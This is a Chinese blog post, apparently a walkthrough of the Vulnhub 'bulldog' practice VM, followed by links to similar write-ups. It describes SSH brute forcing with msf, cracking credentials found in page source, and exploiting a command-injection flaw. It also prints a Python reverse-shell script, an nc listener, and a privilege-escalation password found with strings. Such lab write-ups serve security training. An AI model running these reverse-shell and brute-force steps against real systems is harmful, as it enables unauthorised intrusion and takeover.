靶机实战(bulldog)

最新推荐文章于 2024-02-02 16:11:43 发布
最新推荐文章于 2024-02-02 16:11:43 发布
阅读量407 收藏 1
点赞数
分类专栏: 靶机实战 文章标签: 扫描测试工具 黑盒测试 安全漏洞 nmap shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45605313/article/details/106393196
版权

bulldog

实验环境

靶机:bulldog
测试机:win10 ,kali

实验过程

信息收集

1.主机发现

靶机ip:192.168.238.146
在这里插入图片描述

2.端口扫描

先用masscan进行快速全面的扫描
在这里插入图片描述
nmap扫描得到端口服务信息
在这里插入图片描述

3.目录扫描

访问80,web服务进行目录扫描
在这里插入图片描述
在这里插入图片描述

4.web站指纹

以python环境搭建web
在这里插入图片描述

5.漏洞发现

1.尝试ssh弱口令:利用msf,hydra等
msf:
在这里插入图片描述
在这里插入图片描述
设置参数

set pass_file pwd.txt
set rport 23
set rhost 192.168.238.146
set verbose true
run

在这里插入图片描述
在这里插入图片描述
2.web漏洞
查看目录扫描结果发现:后台登录口: http://192.168.238.131/admin
尝试:sql注入,弱口令,万能密码等尝试登录
在这里插入图片描述
webshell界面:http://192.168…238.131/dev
在这里插入图片描述
需要身份验证
在这里插入图片描述
审查元素发现疑似数据库用户名密码
在这里插入图片描述
md5解密
在这里插入图片描述
尝试在admin页面,和ssh登录
成功登录admin,但提示不允许仍和编辑操作
在这里插入图片描述
回到需身份验证的web界面
在这里插入图片描述
发现命令执行漏洞
在这里插入图片描述

漏洞利用

结合命令执行写python反弹shell脚本

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.238.131",8080))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

将脚本放在var/www/html下开启apache服务,下载至靶机
在这里插入图片描述
在这里插入图片描述
kali :nc -nvlp 8080 监听8080端口
在这里插入图片描述
拿到shell
在这里插入图片描述

提权

python 开启一个终端:

python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述
常规三连 :whoami ,uname -a ,cat etc/issue
在这里插入图片描述
在/home/bulldogadmin/.hiddenadmindirectory 目录下 读取customPermissionApp文件

strings customPermissionApp

找到类似密码: SUPERultimatePASSWORDyouCANTget
在这里插入图片描述
sudo命令拿到权限
在这里插入图片描述

总结

主机发现,nmap -sn ,netdiscover等扫描工具;端口扫描,先masscan进行快速大量的扫描,在nmap 指定端口进行版本,服务等信息搜集,whatweb 进行网站指纹,cms扫描,对收集到的服务版本进行进一步手段,ssh爆破(msf,hydra),登陆口(弱口令,sql注入,万能密码),命令执行漏洞(反弹shell);得到shell后可用python弹一个终端进行操作;提权 :查找关键性文件(apache配置文件,etc/passwd等),查看当前用户是否在sudo组里(sudo su命令输入当前用户密码)

~~...
关注
专栏目录
渗透测试实战2——bulldog1靶机入侵
浅浅的博客
04-25 1003
一、实验环境 攻击(Kali):192.168.247.160 靶机bulldog1):192.168.247.148 二、实验步骤 (一)主动信息收集 1、主发现 2、端口扫描 3、端口服务版本扫描 (二)Web渗透 http服务(80端口) 1、访问目标主 没有发现什么有用信息。 2、网站指纹信息扫描(whatweb) ...
【vulnhub】---bulldog靶机
qq_43168364的博客
08-21 370
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:bolldog靶机(192.168.1.105) 攻击:kali Linux(192.168.1.104) 二、信息收集 主发现 或者用netdiscover也可以。命令:netdiscover -i eth0 -r 192.168.1.0/24 端口扫描,首先用masscan看看它开启了哪些端口,他的速度过快时貌似发现不了某些端口,可以多扫描几次。 使用nmap进行版本探测
kali渗透综合靶机(二)--bulldog靶机
W小哥
03-07 1030
一、靶机下载 靶机下载地址:https://download.vulnhub.com/bulldog/bulldog.ova 二、bulldog靶机搭建 靶机: 将下载好的靶机环境,用VM VirtualBox导入即可使用,管理->导入虚拟电脑 设置网络模式,网卡选择仅主模式 kali攻击: 点开vmware中的虚拟选项编辑器中 点击更改设置,让vmware桥接至VirtualBox...
靶机渗透【bulldog
学信安技术 卫国家之门
11-04 4615
一. bulldog靶机安装 1. 下载bulldog 靶场地址:Bulldog - VulnHub (可自行下载) 百度网盘:bulldog 提取码:qrnf 2. 将下载好的靶机存放在想存放的地方,建议放在其他虚拟相同的目录下 3. 打开VMware,左上角文件 - - 打开 - - 找到存放bulldog的位置 4. 开启bulldog(开启后无需进行其他操作) 二. bulldog靶机渗透 设备信息: kali(NAT)IP:192.168.110.140 bulldog(NAT)IP:
靶机实战(bulldog2)
weixin_45605313的博客
05-28 640
bulldog2实验环境实验过程信息收集1.主发现2.端口扫描3.目录扫描4.漏洞发现漏洞利用提权总结 实验环境 靶机:bulldog2 测试:kali,win10 实验过程 信息收集 1.主发现 靶机IP:192.168.238.149 2.端口扫描 只有80 端口 扫描服务,http开启的方法 3.目录扫描 没有什么有用的东西 4.漏洞发现 可以用searchsploit搜下nginx漏洞 页面发现登录和注册地址,尝试弱口令,爆破,万能密码,逻辑漏洞等 注册页面被限制 审查元素看一
渗透测试实战3——bulldog2靶机入侵
浅浅的博客
04-25 1017
一、实验环境 Kali攻击:192.168.247.149 bulldog 2靶机:192.168.247.150、(192.168.247.151) 开始之前,需先登录bulldog2。账号:dirty,密码:pass,并使其获取IP 二、实验步骤 (一)主动信息收集 1、扫描存活主 2、扫描开放端口(192.168.247.150和192.168.247.151开...
靶机渗透测试实战(三)——Bulldog1渗透实战
橘子女侠
05-09 3756
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (1)信息收集——主发现 (2)信息收集——端口扫描 (3)信息收集——操作系统扫描 (4)Web渗透 四. 实验总结 一. 实验环境 靶机:IP地址暂时未知; 测试:kali IP地址:192.168.37.131 测试:物理win7 二. 实验流程 信息收集——主发现 信息收集——端口扫描 ...
靶机渗透测试实战(四)——Bulldog2渗透实战
橘子女侠
05-10 3043
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (1)信息收集——主发现 (2)信息收集——端口扫描 (3)信息收集——操作系统扫描 (4)渗透测试 四. 实验总结 一. 实验环境 靶机Bulldog2 IP地址暂时未知; 测试:kali IP地址:192.168.37.131 测试:物理win7 二. 实验流程 信息收集——主发现 信息...
靶机实战-bulldog1
滕财然的博客
01-19 1040
bulldog1-靶机实战靶机实战bulldog11、主发现2、扫描端口3、web渗透(80端口)4、提权 靶机实战bulldog1 先要知道对方的IP是否存活,也就是主发现 1、主发现 netdiscover -i etho -r IP/网段 属于主动 -i 指定网卡 -r 指定网段 找到目标靶机IP:192.168.232.134 也可以用nmap -sn 扫,看自己心情。...
Bulldog靶机-walkthrough
ins1ght的博客
09-05 1478
Bulldog靶机,一个CTF类型的靶机
【vulnhub】--- bulldog2靶机
qq_43168364的博客
08-21 451
目录 一、实验环境 靶机bulldog2靶机(192.168.1.102、192.168.1.105) 攻击:kali Linux(192.168.1.104) 二、靶机设置 我们首先进行登录 我们发现登录进去之后靶机是没有IP地址的,我们看看它的网卡配置文件。 这里网卡设置的是dhcp,我们可以通过dhclient命令来获取IP。建议设置为桥接。 现在两个网卡就都有IP地址了。接下来就可以进行渗透了。 三、信息收集 首先用nmap进行主发现,命令:nmap -sn 192.168.1.
靶机测试-bulldog
ximo的博客
02-27 517
测试步骤信息收集主发现端口及其服务扫描目录扫描测试对应端口服务测试后台目录寻找漏洞:反弹shell因为知道网站的编程语言是python,所以可以通过python进行反弹shell:提权 信息收集 主发现 kali IP地址查询,确认靶机存在网段 使用nmap进行主发现: namp -sP 192.168.31.0/24 端口及其服务扫描 nmap -sV -O 192.168.31.181 发现开放了23,80,8080端口及其服务 访问其80及8080端口(因为此端口开放了http服
Bulldog靶机 学习总结 网络安全
Shelby12345的博客
01-31 943
发现了自己django,然后注意到有个id是bulldogadmin的很可疑,再系统中查找一下bulldogadmin所属的文件find / -user bulldogadmin 2>/dev/null(输入SUPERultimatePASSWORDyouCANTget,密码错误,又去找了找前辈的答案,发现H都是多余的,SUPERultimatePASSWORDyouCANTget。直接访问http://192.168.144.137/admin/ 发现需要登陆,F12看一下很干净,没藏东西。
渗透靶机BULLDOG
最新发布
qq_43235703的博客
02-02 1176
靶机渗透之BULLDOG 渗透环境: 攻击:kali(10.0.10.198) 靶机:vmbox(10.0.10.208) 连接模式:全部为桥接 探嗅目标 安装好我们的靶机之后开,然后你的ip地址就出现在靶机界面上面,也省了我们用kali来扫 但是多少这达不到我们模拟实战过程,真正的渗透谁会把地址摆着给你啊对不对,所以还是要动手用netdiscover来扫一波,直接扫出来然后上nmap扫端...
[渗透测试靶机10] vulnhub靶场 BULLDOG_ 1
weixin_47112073的博客
11-13 376
这个靶机难度较为简单,可以简单练手
bulldog2--靶机渗透
weixin_44769042的博客
10-30 556
靶机记录--7 目录 分配ip 主发现 端口扫描 服务版本,操作系统扫描 开始渗透 水平越权 垂直越权 反弹shell 尝试提权 得到flag 总结 分配ip 这个靶机的IP要重新分发(dhclient) 主发现 端口扫描 这里扫到两个ip,但是mac地址相同,扫一个就行 服务版本,操作系统扫描 开始渗透 1> 来到主页,有登陆点,注册点 2> 来到登陆点,万能密码,弱口令,暴力破解走一波 3...
Vulnhub-Bulldog靶机实战
御七彩虹猫
03-24 1456
Vulnhub-Bulldog靶机实战
学习渗透日记4 靶机bulldog实战
qq_56902810的博客
04-26 225
bulldog靶机完整渗透版!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值